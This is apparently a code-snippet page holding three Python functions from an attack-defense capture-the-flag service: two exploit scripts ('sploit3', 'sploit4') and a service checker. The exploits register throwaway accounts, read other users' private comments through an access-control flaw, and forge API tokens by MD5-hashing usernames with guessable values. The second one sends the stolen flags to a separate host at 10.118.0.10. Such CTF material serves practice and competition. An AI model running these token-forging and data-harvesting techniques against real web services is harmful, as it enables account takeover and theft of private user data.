Esempio n. 1
0
def sploit3(hostname: str) -> list:
    api = Api(hostname)
    username = get_random_string()
    api.sing_up(username, get_random_string(), get_random_string(),
                get_random_string())

    token = api.generate_token()
    flags = []
    for page_n in range(0, 10):
        barks_list = api.api_get_last_barks(token, page_n)
        for bark in barks_list:
            bark_id = bark["id"]
            comments = api.api_comments(token, bark_id)
            flags += [
                comment["text"] for comment in comments
                if comment["is_private"] and FLAG_REGEXP.match(comment["text"])
            ]
        if not barks_list:
            break

    return flags
Esempio n. 2
0
def sploit4(hostname: str) -> list:
    api = Api(hostname)
    username = get_random_string()
    api.sing_up(username, get_random_string(), get_random_string(),
                get_random_string())

    token = api.generate_token()
    flags = []
    tokens = []
    bark_ids = []
    page_n = 0

    barks_list = api.api_get_last_barks(token, page_n)
    for bark in barks_list:
        bark_ids.append(bark["id"])

    users_list = api.api_get_users(token, page_n)
    for user in users_list:
        for generation in generations:
            token = hashlib.md5(
                f"{user['username']}{generation}".encode()).hexdigest()
            r = api.api_index(token)
            if r:
                print(token)
                for bark_id in bark_ids:
                    comments = api.api_comments(token, bark_id)
                    flags += [
                        comment["text"] for comment in comments
                        if comment["is_private"]
                        and FLAG_REGEXP.match(comment["text"])
                    ]
                print(flags)
                requests.put("http://10.118.0.10/flags",
                             headers={"X-Team-Token": TOKEN},
                             json=flags)
                break

    return flags
Esempio n. 3
0
def check(check_request: CheckRequest) -> Verdict:
    api = Api(check_request.hostname)
    try:
        username = get_random_str()
        password = get_random_str()
        r = api.sing_up(username, password, get_random_str(), get_random_str())
        if r.status_code == 200 and f"{api.url}/{username}/" != r.url:
            print(f"Found {r.url}, but wait {api.url}/{username}. Status code {r.status_code}")
            return Verdict.MUMBLE("can't pass registration")
        
        bark = get_random_text()
        r = api.add_bark(username, bark)
        if r.status_code == 200 and f"{api.url}/{username}/" != r.url or bark not in r.text:
            print(f"Found {r.url}, but wait {api.url}/{username} OR '{bark}' not in response. Status code: {r.status_code}")
            return Verdict.MUMBLE("can't create bark")

        bark_id = int(r.text.split(bark)[0].split("/get_bark/")[1][0:-3])
        comment = get_random_text()
        r = api.comment_bark(bark_id, comment)
        if r.status_code == 200 and comment not in r.text:
            print(f"Comment {comment} not in response. Status code: {r.status_code}")
            return Verdict.MUMBLE("can't create comment")
        
        api.logout()

        new_username = get_random_str()
        new_password = get_random_str()
        r = api.sing_up(new_username, new_password, get_random_str(), get_random_str())
        r = api.add_friend(username)

        if r.status_code == 200 and username not in r.text:
            print(f"Can't find {username} in friends list. Status code: {r.status_code}")
            return Verdict.MUMBLE("can't add friend")
        
        api.logout()

        r = api.login(username, password)
        if r.status_code == 200 and f"{api.url}/{username}/" != r.url:
            print(f"Found {r.url}, but wait {api.url}/{username}. Status code: {r.status_code}")
            return Verdict.MUMBLE("can't log in")

        r = api.confirm_friend(new_username)
        if r.status_code == 200 and username not in r.text:
            print(f"Friend {username} not found in friends list. Status code: {r.status_code}")
            return Verdict.MUMBLE("can't confirm friend")

        token = api.generate_token()
        if not token:
            print(f"Can't get token")
            return Verdict.MUMBLE("can't get token")

        api.logout()

        user_dict = api.api_index(token)
        if user_dict['username'] != username or user_dict['token'] != token:
            print(f"Fields username and token isn't correct. Found: {user_dict['username']}, {user_dict['token']}. Wait: {username}, {token}")
            return Verdict.MUMBLE("api user info incorrect")

        barks_list = api.api_barks(token, username)
        for user_bark in barks_list:
            if user_bark['text'] == bark:
                break
        else:
            print(f"Wait for '{bark}', but got {user_bark['text']}")
            return Verdict.MUMBLE("incorrect bark")

        comments_list = api.api_comments(token, bark_id)
        for user_comment in comments_list:
            if user_comment['text'] == comment:
                break
        else:
            print(f"Wait for '{comment}', but got {user_comment['text']}")
            return Verdict.MUMBLE("incorrect comment")

        user_info = api.api_user_info(token, username)
        if user_info['username'] != username or user_info['id'] != user_dict['id']:
            print(f"Incorrect user_info. Got {user_info['username']}, {user_info['id']}, but wait {username}, {user_dict['id']}")
            return Verdict.MUMBLE("incorrect user info")

        for i in range(0, 5):
            users_list = api.api_get_users(token, i)
            if [u for u in users_list if u['username'] == username and u['id'] == user_dict['id']]:
                break
        else:
            print(f"can't find user via api")
            return Verdict.MUMBLE("can't find user")

        for i in range(0, 5):
            barks_list = api.api_get_last_barks(token, i)
            if [b for b in barks_list if b['id'] == bark_id]:
                break
        else:
            print(f"can't find user via api")
            return Verdict.MUMBLE("can't find user")

        return Verdict.OK()
    except RequestException as e:
        print(f"can't connect due to {e}")
        return Verdict.DOWN("can't connect to host")
    except Exception as e:
        print(e)
        return Verdict.MUMBLE("bad proto")